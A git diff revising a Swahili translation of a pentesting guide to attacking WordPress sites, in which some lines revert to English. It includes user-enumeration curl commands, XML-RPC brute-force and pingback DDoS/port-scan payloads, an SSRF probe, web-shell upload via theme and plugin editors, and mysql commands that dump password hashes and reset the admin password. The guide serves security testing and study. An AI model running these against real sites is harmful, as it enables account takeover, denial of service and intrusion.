 - **OWASP API Security Top 10**: Kusoma muhimu kwa kuelewa udhaifu wa kawaida wa API ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)).
-- **API Security Checklist**: Orodha kamili ya kuhakikisha usalama wa APIs ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)).
-- **Logger++ Filters**: Kwa ajili ya kuwinda udhaifu wa API, Logger++ inatoa filters muhimu ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)).
-- **API Endpoints List**: Orodha iliyochaguliwa ya mwisho wa API zinazoweza kutumika kwa madhumuni ya kupima ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)).
+- **API Security Checklist**: Orodha kamili ya ukaguzi kwa ajili ya usalama wa API ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)).
+- **Logger++ Filters**: Kwa kuwinda udhaifu wa API, Logger++ inatoa vichujio muhimu ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)).
+- **API Endpoints List**: Orodha iliyochaguliwa ya endpoints za API zinazowezekana kwa madhumuni ya upimaji ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)).
 
-## Marejeleo
+## Marejeo
 
 - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
+- [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md
index d0503929f..05ccea886 100644
--- a/src/network-services-pentesting/pentesting-web/wordpress.md
+++ b/src/network-services-pentesting/pentesting-web/wordpress.md
@@ -4,49 +4,49 @@
 
 ## Taarifa za Msingi
 
-- **Faili zilizopakiwa** huenda kwa: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
-- **Faili za theme zinaweza kupatikana katika /wp-content/themes/,** hivyo ukibadilisha php ya theme ili kupata RCE labda utatumia path hiyo. Kwa mfano: Kwa kutumia **theme twentytwelve** unaweza **kupata** faili ya **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
+- **Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
-- **URL nyingine yenye manufaa inaweza kuwa:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
-- Katika **wp-config.php** unaweza kupata nenosiri la root la database.
-- Njia za kuingia za default za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
+- Katika **wp-config.php** unaweza kupata password ya root ya database.
+- Njia za kuingia za default za kuchunguza: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
 
-### **Main WordPress Files**
+### **Faili Muhimu za WordPress**
 
 - `index.php`
-- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanidiwa.
-- `wp-activate.php` inatumika kwa mchakato wa uanzishaji wa barua pepe wakati wa kuweka tovuti mpya ya WordPress.
-- Folda za login (zinaweza kubadilishwa jina ili kuficha):
+- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanikishwa.
+- `wp-activate.php` inatumika kwa mchakato wa uthibitisho wa email wakati wa kuanzisha tovuti mpya ya WordPress.
+- Folda za login (zinaweza kubadilishwa jina ili kuzificha):
 - `/wp-admin/login.php`
 - `/wp-admin/wp-login.php`
 - `/login.php`
 - `/wp-login.php`
-- `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachoruhusu data kutumwa kutumia HTTP kama njia ya usafirishaji na XML kama mbinu ya enkoding. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
-- Folda ya `wp-content` ni saraka kuu ambapo plugins na themes zinahifadhiwa.
-- `wp-content/uploads/` Ni saraka ambayo faili zote zinazopakiwa kwenye jukwaa zinalindwa.
-- `wp-includes/` Hii ni saraka ambapo faili za kernel zinahifadhiwa, kama certificates, fonts, faili za JavaScript, na widgets.
-- `wp-sitemap.xml` Katika matoleo ya WordPress 5.5 na zaidi, WordPress huzalisha faili ya sitemap XML yenye machapisho yote ya umma na aina za post na taxonomies zinazoweza kuhojiwa hadharani.
+- `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachowezesha data kutumwa kwa kutumia HTTP kama mekanisma ya usafirishaji na XML kama mekanisma ya ufafanuzi. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
+- Kabrasha la `wp-content` ndilo saraka kuu ambapo plugins na themes zinahifadhiwa.
+- `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye jukwaa zinahifadhiwa.
+- `wp-includes/` Hii ni saraka ambapo faili za msingi zinahifadhiwa, kama vyeti, fonts, faili za JavaScript, na widgets.
+- `wp-sitemap.xml` Katika toleo la WordPress 5.5 na zaidi, WordPress inazalisha faili ya sitemap XML yenye machapisho yote ya umma na aina za posti zinazoweza kuombwa hadharani na taxonomies.
 
 **Post exploitation**
 
-- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys and salts, na prefix ya jedwali la database. Faili hii ya configuration pia inaweza kutumika kuwasha DEBUG mode, ambayo inaweza kusaidia katika kutatua matatizo.
+- The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
 
-### Ruhusa za Watumiaji
+### Ruhusa za watumiaji
 
 - **Administrator**
 - **Editor**: Kuchapisha na kusimamia machapisho yake na ya wengine
 - **Author**: Kuchapisha na kusimamia machapisho yake mwenyewe
 - **Contributor**: Kuandika na kusimamia machapisho yake lakini hawezi kuyachapisha
-- **Subscriber**: Kuangalia machapisho na kuhariri wasifu wao
+- **Subscriber**: Kusoma machapisho na kuhariri wasifu wao
 
-## **Passive Enumeration**
+## **Uchunguzi wa Kiasili**
 
-### **Get WordPress version**
+### **Pata toleo la WordPress**
 
 Angalia kama unaweza kupata faili `/license.txt` au `/readme.html`
 
-Ndani ya **msimbo wa chanzo** wa ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
+Ndani ya **source code** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
 
 - grep
 ```bash
@@ -56,7 +56,7 @@ curl https://victim.com/ | grep 'content="WordPress'
 
 ![](<../../images/image (1111).png>)
 
-- Faili za viungo vya CSS
+- Faili za link za CSS
 
 ![](<../../images/image (533).png>)
 
@@ -72,44 +72,44 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
 ```bash
 curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
 ```
-### Chota matoleo kwa ujumla
+### Kutoa matoleo kwa ujumla
 ```bash
 curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
 
 ```
-## Uorodhesaji hai
+## Active enumeration
 
-### Plugins and Themes
+### Plugins na Themes
 
-Labda hautaweza kupata Plugins na Themes zote zinazowezekana. Ili kugundua zote, utahitaji **Brute Force kwa vitendo orodha ya Plugins na Themes** (kwa bahati nzuri kwetu zipo zana za kiotomatiki ambazo zina orodha hizi).
+Huenda hautaweza kupata Plugins na Themes zote zinazowezekana. Ili kuzitambua zote, utahitaji **actively Brute Force a list of Plugins and Themes** (tumaini letu ni kwamba kuna zana za otomatiki zinazoshikilia orodha hizi).
 
 ### Watumiaji
 
-- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing IDs za watumiaji:
+- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing users IDs:
 ```bash
 curl -s -I -X GET http://blog.example.com/?author=1
 ```
-Ikiwa majibu ni **200** au **30X**, hiyo ina maana kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id si **halali**.
+Ikiwa majibu ni **200** au **30X**, hiyo ina maana kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**.
 
 - **wp-json:** Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza:
 ```bash
 curl http://blog.example.com/wp-json/wp/v2/users
 ```
-Endpoint nyingine ya `/wp-json/` ambayo inaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:
+Endpoint mwingine wa `/wp-json/` ambao unaweza kufunua taarifa fulani kuhusu watumiaji ni:
 ```bash
 curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 ```
-Kumbuka kuwa endpoint hii inaonyesha tu watumiaji waliofanya chapisho. **Taarifa tu kuhusu watumiaji ambao wamewezeshwa na kipengele hiki ndizo zitatolewa**.
+Kumbuka kuwa endpoint hii inaonyesha tu watumiaji waliofanya chapisho. **Taarifa tu kuhusu watumiaji ambao kipengele hiki kimewezeshwa zitatolewa**.
 
-Pia kumbuka kwamba **/wp-json/wp/v2/pages** inaweza leak anwani za IP.
+Pia kumbuka kuwa **/wp-json/wp/v2/pages** inaweza leak IP addresses.
 
-- **Login username enumeration**: Unapojaribu kuingia kwenye **`/wp-login.php`**, **ujumbe** ni **tofauti** ikionyesha kama **jina la mtumiaji lipo au halipo**.
+- **Login username enumeration**: Unapoingia kwenye **`/wp-login.php`**, ujumbe ni tofauti kulingana na kama username iliyotajwa ipo au la.
 
 ### XML-RPC
 
-Ikiwa `xml-rpc.php` iko hai unaweza kufanya credentials brute-force au kuitumia kuanzisha DoS attacks kwa rasilimali nyingine. (Unaweza ku-automate mchakato huu[ using this](https://github.com/relarizky/wpxploit) kwa mfano).
+Ikiwa `xml-rpc.php` iko active unaweza kufanya credentials brute-force au kuitumia kuanzisha mashambulizi ya DoS kwa rasilimali nyingine. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
 
-To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
+Ili kuona kama iko active, jaribu kufikia _**/xmlrpc.php**_ na tuma ombi hili:
 
 **Angalia**
 ```html
@@ -122,7 +122,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
 
 **Credentials Bruteforce**
 
-**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kufanya brute-force credentials. Ikiwa unaweza kupata yoyote yao, unaweza kutuma kitu kama:
+**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kufanya brute-force kwa credentials. Ikiwa unaweza kupata yoyote yao unaweza kutuma kitu kama:
 ```html
 <methodCall>
 <methodName>wp.getUsersBlogs</methodName>
@@ -132,13 +132,13 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
 </params>
 </methodCall>
 ```
-Ujumbe _"Jina la mtumiaji au nenosiri si sahihi"_ ndani ya response ya code 200 unapaswa kuonekana ikiwa credentials sio halali.
+Ujumbe _"Incorrect username or password"_ ndani ya 200 code response unapaswa kuonekana ikiwa credentials hazitakuwa sahihi.
 
 ![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
 
 ![](<../../images/image (721).png>)
 
-Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response njia itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
+Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response path itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
 ```html
 <?xml version='1.0' encoding='utf-8'?>
 <methodCall>
@@ -168,18 +168,18 @@ Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response njia itaon
 </params>
 </methodCall>
 ```
-Pia kuna **njia ya haraka** ya kufanya brute-force ya jina la mtumiaji na nywila kwa kutumia **`system.multicall`**, kwani unaweza kujaribu vigezo vingi kwenye ombi moja:
+Pia kuna njia ya haraka zaidi ya brute-force credentials ukitumia **`system.multicall`** kwani unaweza kujaribu credentials kadhaa kwenye ombi moja:
 
 <figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
 
 **Bypass 2FA**
 
-Njia hii imelengwa kwa programu, si kwa watu, na ni ya zamani; kwa hiyo haiungi mkono 2FA. Hivyo, ikiwa una creds halali lakini mlango mkuu umehifadhiwa na 2FA, **inawezekana utaweza kutumia xmlrpc.php kuingia kwa kutumia creds hizo ukiepuka 2FA**. Kumbuka hautaweza kutekeleza vitendo vyote unavyoweza kupitia console, lakini bado unaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
+Njia hii imetengenezwa kwa programs na si za wanadamu, na ni ya zamani, kwa hivyo haitegemei 2FA. Kwa hivyo, ikiwa una valid creds lakini mlango kuu umehifadhiwa kwa 2FA, **unaweza kuabusu xmlrpc.php ku-login kwa kutumia hao creds na kupita 2FA**. Kumbuka kuwa hutaweza kutekeleza vitendo vyote unavyoweza kupitia console, lakini bado unaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
 
 **DDoS or port scanning**
 
-Ikiwa unaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\
-Hii inaweza kutumika kuagiza **maelfu** za Wordpress **tovuti** **kuingia** eneo moja (hivyo kusababisha **DDoS** katika eneo hilo) au unaweza kuitumia kufanya **Wordpress** ili **scan** baadhi ya mitandao ya ndani (unaweza kubainisha bandari yoyote).
+Ikiwa utaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\
+Hii inaweza kutumika kuomba **maelfu** ya Wordpress **sites** ku**access** eneo moja (hivyo kusababisha **DDoS** eneo hilo) au unaweza kuitumia kufanya **Wordpress** i**scan** baadhi ya **internal network** (unaweza kuonyesha port yoyote).
 ```html
 <methodCall>
 <methodName>pingback.ping</methodName>
@@ -191,9 +191,9 @@ Hii inaweza kutumika kuagiza **maelfu** za Wordpress **tovuti** **kuingia** eneo
 ```
 ![](../../images/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
 
-Ikiwa unapata **faultCode** yenye thamani **kubwa kuliko** **0** (17), ina maana bandari iko wazi.
+Ikiwa unapata **faultCode** yenye thamani **kubwa kuliko** **0** (17), ina maana port iko wazi.
 
-Angalia matumizi ya **`system.multicall`** katika sehemu ya awali ili kujifunza jinsi ya kutumia vibaya njia hii kusababisha DDoS.
+Angalia matumizi ya `system.multicall` katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha **DDoS**.
 
 **DDoS**
 ```html
@@ -209,17 +209,17 @@ Angalia matumizi ya **`system.multicall`** katika sehemu ya awali ili kujifunza
 
 ### wp-cron.php DoS
 
-Faili hii kawaida hupatikana chini ya mizizi ya tovuti ya Wordpress: **`/wp-cron.php`**\
-Wakati faili hii inapofikiwa hufanywa MySQL **query** ya **"nzito"**, hivyo inaweza kutumiwa na **attackers** **kusababisha** **DoS**.\
-Pia, kwa chaguo-msingi, `wp-cron.php` huitwa kila inapopakiwa ukurasa (wakati wowote mteja anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS).
+Faili hii kawaida huiwepo chini ya root ya Wordpress site: **`/wp-cron.php`**\
+Wakati faili hii ikiwa **accessed** hufanyika "**heavy**" MySQL **query**, hivyo inaweza kutumiwa na **attackers** kusababisha **DoS**.\
+Pia, kwa default, `wp-cron.php` huitwa kila page load (kila mara client anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye maeneo yenye trafiki kubwa linaweza kusababisha matatizo (DoS).
 
-Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya seva itakayotekeleza vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).
+Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host ili ifanye vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).
 
 ### /wp-json/oembed/1.0/proxy - SSRF
 
-Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma ombi kwako.
+Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma request kwako.
 
-This is the response when it doesn't work:
+Hii ndiyo response inapotakuwa haifanyi kazi:
 
 ![](<../../images/image (365).png>)
 
@@ -230,24 +230,24 @@ This is the response when it doesn't work:
 https://github.com/t0gu/quickpress/blob/master/core/requests.go
 {{#endref}}
 
-Chombo hiki hukagua kama **methodName: pingback.ping** ipo na kama path **/wp-json/oembed/1.0/proxy** upo; ikiwa zipo, kinajaribu kuzitumia (exploit).
+Tool hii inakagua kama **methodName: pingback.ping** ipo na pia path **/wp-json/oembed/1.0/proxy**, na ikiwa zipo, inajaribu kuzi-exploit.
 
-## Zana za Kiotomatiki
+## Zana za Otomatiki
 ```bash
 cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
 wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
 #You can try to bruteforce the admin user using wpscan with "-U admin"
 ```
-## Pata ufikiaji kwa kubadilisha biti
+## Pata ufikiaji kwa kubadilisha bit
 
-Zaidi ya kuwa shambulio la kweli, hili ni udadisi. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) unaweza kubadilisha biti 1 kutoka kwa faili yoyote ya wordpress. Kwa hivyo unaweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kufanya operesheni ya NOT (`!`) kuwa NOP.
+Hii ni zaidi ya udadisi kuliko shambulio halisi. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) ulikuwa unaweza kugeuza 1 bit kutoka kwa faili yoyote ya wordpress. Kwa hivyo ungeweza kugeuza nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kuifanya operesheni ya NOT (`!`) kuwa NOP.
 ```php
 if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
 return new WP_Error(
 ```
-## **Paneli RCE**
+## **RCE ya Paneli**
 
-**Kurekebisha php kutoka kwenye theme inayotumika (inahitaji kredensiali za admin)**
+**Kubadilisha faili ya php ya theme inayotumika (inahitaji nyaraka za admin)**
 
 Appearance → Theme Editor → 404 Template (kwa upande wa kulia)
 
@@ -255,7 +255,7 @@ Badilisha yaliyomo kwa php shell:
 
 ![](<../../images/image (384).png>)
 
-Tafuta mtandaoni jinsi unaweza kufikia ukurasa uliosasishwa. Katika kesi hii, unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa. Katika kesi hii unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
 ### MSF
 
@@ -269,8 +269,8 @@ kupata session.
 
 ### PHP plugin
 
-Inawezekana kupakia .php files kama plugin.\
-Tengeneza php backdoor yako kwa mfano:
+Inaweza kuwa inawezekana kupakia faili za .php kama plugin.\
+Unda PHP backdoor yako kwa mfano:
 
 ![](<../../images/image (183).png>)
 
@@ -278,82 +278,82 @@ Kisha ongeza plugin mpya:
 
 ![](<../../images/image (722).png>)
 
-Pakia plugin na bonyeza Install Now:
+Pakia plugin kisha bonyeza Install Now:
 
 ![](<../../images/image (249).png>)
 
-Bonyeza Procced:
+Bonyeza Proceed:
 
 ![](<../../images/image (70).png>)
 
-Inawezekana hili halitaonekana kufanya chochote, lakini ukitembelea Media, utaona shell yako imepakwa:
+Huenda hii isifanye chochote kwa dhati, lakini ukienda Media, utaona shell yako imepakiwa:
 
 ![](<../../images/image (462).png>)
 
-Ifikie na utaona URL ya kuendesha reverse shell:
+Fikia hiyo na utaona URL ya kutekeleza reverse shell:
 
 ![](<../../images/image (1006).png>)
 
 ### Uploading and activating malicious plugin
 
-Njia hii inahusisha usakinishaji wa plugin yenye madhara inayojulikana kuwa na udhaifu na inaweza kutumika kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo:
+Njia hii inahusisha usakinishaji wa malicious plugin inayojulikana kuwa vulnerable na inaweza kutumiwa kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo:
 
-1. **Plugin Acquisition**: Plugin hupatikana kutoka chanzo kama Exploit DB like [**here**](https://www.exploit-db.com/exploits/36374).
+1. **Plugin Acquisition**: Plugin hupatikana kutoka kwenye chanzo kama Exploit DB kama [**here**](https://www.exploit-db.com/exploits/36374).
 2. **Plugin Installation**:
-- Nenda kwenye WordPress dashboard, kisha nenda kwa `Dashboard > Plugins > Upload Plugin`.
-- Pakia faili la zip la plugin ulilopakua.
-3. **Plugin Activation**: Mara plugin itakapowekwa kwa mafanikio, lazima iwe imewezeshwa kupitia dashboard.
+- Navigate to the WordPress dashboard, then go to `Dashboard > Plugins > Upload Plugin`.
+- Upload the zip file of the downloaded plugin.
+3. **Plugin Activation**: Mara plugin inapowekwa kwa mafanikio, lazima iamishwe kupitia dashboard.
 4. **Exploitation**:
-- Ukiwa na plugin "reflex-gallery" imewekwa na imewezeshwa, inaweza kutumika kwani inajulikana kuwa na udhaifu.
-- Metasploit framework inatoa exploit kwa udhaifu huu. Kwa kupakia module inayofaa na kutekeleza amri maalum, meterpreter session inaweza kuanzishwa, ikitoa ufikiaji usioidhinishwa kwenye tovuti.
-- Imetajwa kwamba hii ni mojawapo ya njia nyingi za kutumia udhaifu wa tovuti ya WordPress.
+- With the plugin "reflex-gallery" installed and activated, it can be exploited as it is known to be vulnerable.
+- The Metasploit framework provides an exploit for this vulnerability. By loading the appropriate module and executing specific commands, a meterpreter session can be established, granting unauthorized access to the site.
+- It's noted that this is just one of the many methods to exploit a WordPress site.
 
-Yaliyomo yanajumuisha picha zinazoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na haifai bila idhini sahihi. Taarifa hizi zinapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama penetration testing na idhini wazi.
+Yaliyomo yanajumuisha msaada wa kuona unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kuelewa kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na si ya maadili bila idhini stahiki. Taarifa hizi zitumike kwa uwajibikaji na tu katika muktadha halali, kama pentesting kwa idhini dhahiri.
 
 **For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
 
-## From XSS to RCE
+## Kutoka XSS hadi RCE
 
-- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua uvujaji wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au udhaifu mwingine mzito katika WordPress. Kwa habari zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**
-- _**Privilege Escalation:**_ Huunda mtumiaji ndani ya WordPress.
-- _**(RCE) Custom Plugin (backdoor) Upload:**_ Pakia custom plugin yako (backdoor) kwenye WordPress.
-- _**(RCE) Built-In Plugin Edit:**_ Hariri Built-In Plugins katika WordPress.
-- _**(RCE) Built-In Theme Edit:**_ Hariri Built-In Themes katika WordPress.
-- _**(Custom) Custom Exploits:**_ Custom Exploits kwa Third-Party WordPress Plugins/Themes.
+- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kukuza **Cross-Site Scripting (XSS)** vulnerability hadi **Remote Code Execution (RCE)** au vunja usalama mwingine hatari katika WordPress. Kwa habari zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa msaada kwa WordPress Versions 6.X.X, 5.X.X na 4.X.X na inaruhusu:
+- _**Privilege Escalation:**_ Creates an user in WordPress.
+- _**(RCE) Custom Plugin (backdoor) Upload:**_ Upload your custom plugin (backdoor) to WordPress.
+- _**(RCE) Built-In Plugin Edit:**_ Edit a Built-In Plugins in WordPress.
+- _**(RCE) Built-In Theme Edit:**_ Edit a Built-In Themes in WordPress.
+- _**(Custom) Custom Exploits:**_ Custom Exploits for Third-Party WordPress Plugins/Themes.
 
 ## Post Exploitation
 
-Chukua majina ya watumiaji na nywila:
+Chota usernames na passwords:
 ```bash
 mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
 ```
-Badilisha admin password:
+Badilisha password ya admin:
 ```bash
 mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
 ```
 ## Wordpress Plugins Pentest
 
-### Uso wa Mashambulizi
+### Attack Surface
 
-Kujua jinsi plugin ya Wordpress inaweza kuweka wazi utendakazi ni muhimu ili kupata udhaifu katika utendakazi wake. Unaweza kuona jinsi plugin inaweza kuweka wazi utendakazi katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo na udhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
+Kujua jinsi Wordpress plugin inavyoweza kufichua functionality ni muhimu ili kupata vulnerabilities kwenye functionality yake. Unaweza kuona jinsi plugin inaweza kufichua functionality katika pointi zifuatazo na baadhi ya mifano ya vulnerable plugins katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
 
 - **`wp_ajax`**
 
-Moja ya njia plugin inaweza kufichua functions kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na bugs za logic, authorization, au authentication. Aidha, mara nyingi functions hizi zitategemea authentication na authorization kwa kuwepo kwa wordpress nonce ambayo **mtumiaji yeyote aliye-authenticated kwenye instance ya Wordpress anaweza kuwa nayo** (hata bila kuzingatia jukumu lake).
+Mojawapo ya njia plugin inaweza kufichua functions kwa users ni kupitia AJAX handlers. Hizi zinaweza kuwa na logic, authorization, au authentication bugs. Zaidi ya hayo, mara nyingi hizi functions zitategemea authentication na authorization kwa kuwepo kwa Wordpress nonce ambayo **any user authenticated in the Wordpress instance might have** (independently of its role).
 
 Hizi ni functions ambazo zinaweza kutumika kufichua function katika plugin:
 ```php
 add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
 add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
 ```
-**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wasiothibitishwa).**
+**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasio na uthibitisho).**
 
 > [!CAUTION]
-> Zaidi ya hayo, ikiwa function inachunguza tu idhini ya mtumiaji kwa kutumia `wp_verify_nonce`, function hii inabaini tu kwamba mtumiaji ameingia; kwa kawaida haitambui jukumu la mtumiaji. Kwa hivyo watumiaji wenye ruhusa ndogo wanaweza kufanya vitendo vinavyohitaji ruhusa za juu.
+> Zaidi ya hayo, ikiwa function inachunguza idhini ya mtumiaji kwa kutumia function `wp_verify_nonce`, function hii inabaini tu kwamba mtumiaji ameingia, na kawaida haiangalii cheo la mtumiaji. Kwa hivyo watumiaji wenye ruhusa ndogo wanaweza kupata ufikiaji wa vitendo vyenye ruhusa kubwa.
 
 - **REST API**
 
-Pia inawezekana kufunua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`:
